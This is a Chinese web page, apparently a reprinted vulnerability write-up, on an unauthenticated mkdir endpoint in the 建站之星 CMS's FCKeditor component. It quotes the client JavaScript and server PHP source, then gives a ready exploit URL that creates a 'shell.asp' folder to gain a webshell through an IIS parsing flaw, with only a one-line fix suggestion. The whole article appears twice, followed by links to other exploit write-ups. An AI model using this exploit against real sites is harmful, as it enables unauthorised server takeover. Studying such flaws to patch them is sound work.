您现在的位置是:网站首页> 编程资料编程资料
建站之星全版本后台通杀getshell的解析与解决方法_漏洞分析_网络安全_
2023-05-24
325人已围观
简介 建站之星全版本后台通杀getshell的解析与解决方法_漏洞分析_网络安全_
找到一个fck改的编辑器,准备用解析洞日之。
然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,
反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:
function addSort(obj) {
$(obj).parent().find(‘span’).css(‘display’,'inline-block’);
$(obj).css(‘display’,'none’);
$(obj).parent().find(‘span > input:first’).focus();
}
function newDir(obj) {
var pth = $(obj).prev().attr(‘value’);
var basepth = $(‘#gtcurdir option:selected’).text();
if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.
alert(“请输入字符”);
$(obj).prev().focus();
return false;
} else {
$.ajax({
type : “GET”,
dataType : “text”,
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。
success : function(response) {
switch (response) {
case ’0′:
$(obj).prev().val(”);
$(obj).parent().css(‘display’,'none’);
$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);
$(‘’).appendTo(‘#gtcurdir’);
break;
case ‘-1′:
alert(“文件夹已存在!”);
$(obj).prev().focus();
break;
case ‘-2′:
alert(“新建文件夹失败!”);
break;
}
},
error : function(response) {
alert(“请求失败!”);
return false;
}
});
}
看完函数 发现有一个很有意思的地方:
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,
这里直接post出去命令。那么我们可否构造呢
于是查看了这个脚本的源码:
!!!竟然没有验证
header(‘Conten-type:text/html; charset=UTF-8′);
define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));
$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));
define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));
$err = ’0′;
$basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量
$newdir = trim($_GET['newdir']);
// is or not exist dir
$hd = dir(“../../”.$basedir);
while(($path = $hd->read()) !== false) {
if ($path == $newdir) {
$err = ‘-1′;
break;
} else continue;
}
if ($err != ‘-1′) {
if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;
}
echo $err;
?>
程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。
到这里知道了程序漏洞所在。附上exp:
http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp
返回0则表示成功。
修复方案:
对mkdir.ajax.php加验证
然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,
反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:
复制代码
代码如下:function addSort(obj) {
$(obj).parent().find(‘span’).css(‘display’,'inline-block’);
$(obj).css(‘display’,'none’);
$(obj).parent().find(‘span > input:first’).focus();
}
function newDir(obj) {
var pth = $(obj).prev().attr(‘value’);
var basepth = $(‘#gtcurdir option:selected’).text();
if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.
alert(“请输入字符”);
$(obj).prev().focus();
return false;
} else {
$.ajax({
type : “GET”,
dataType : “text”,
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。
success : function(response) {
switch (response) {
case ’0′:
$(obj).prev().val(”);
$(obj).parent().css(‘display’,'none’);
$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);
$(‘’).appendTo(‘#gtcurdir’);
break;
case ‘-1′:
alert(“文件夹已存在!”);
$(obj).prev().focus();
break;
case ‘-2′:
alert(“新建文件夹失败!”);
break;
}
},
error : function(response) {
alert(“请求失败!”);
return false;
}
});
}
看完函数 发现有一个很有意思的地方:
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,
这里直接post出去命令。那么我们可否构造呢
于是查看了这个脚本的源码:
!!!竟然没有验证
复制代码
代码如下:header(‘Conten-type:text/html; charset=UTF-8′);
define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));
$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));
define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));
$err = ’0′;
$basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量
$newdir = trim($_GET['newdir']);
// is or not exist dir
$hd = dir(“../../”.$basedir);
while(($path = $hd->read()) !== false) {
if ($path == $newdir) {
$err = ‘-1′;
break;
} else continue;
}
if ($err != ‘-1′) {
if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;
}
echo $err;
?>
程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。
到这里知道了程序漏洞所在。附上exp:
http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp
返回0则表示成功。
修复方案:
对mkdir.ajax.php加验证
相关内容
- 新浪微博及招聘的两个XSS漏洞分析与解决方法_漏洞分析_网络安全_
- 新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用]_漏洞分析_网络安全_
- 利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)_漏洞分析_网络安全_
- 优酷资源管理系统V1.0的设计缺陷的分析与解决方案_漏洞分析_网络安全_
- 百度知道漏洞之存在反射型XSS的分析与解决方法_漏洞分析_网络安全_
- 盛大游戏外包管理平台FCK列全盘目路分析与解决方案_漏洞分析_网络安全_
- 搜狐微博的几处CSRF漏洞分析与解决方法_漏洞分析_网络安全_
- phpdisk 漏洞发布 phpdisk header bypass & getShell exp解析_漏洞分析_网络安全_
- 从知名专业社交网站linkedin数据库泄漏事件中引发的思考(图文)_漏洞分析_网络安全_
- 又拍图片管家支付非法充值的漏洞分析及修复方法(图)_漏洞分析_网络安全_
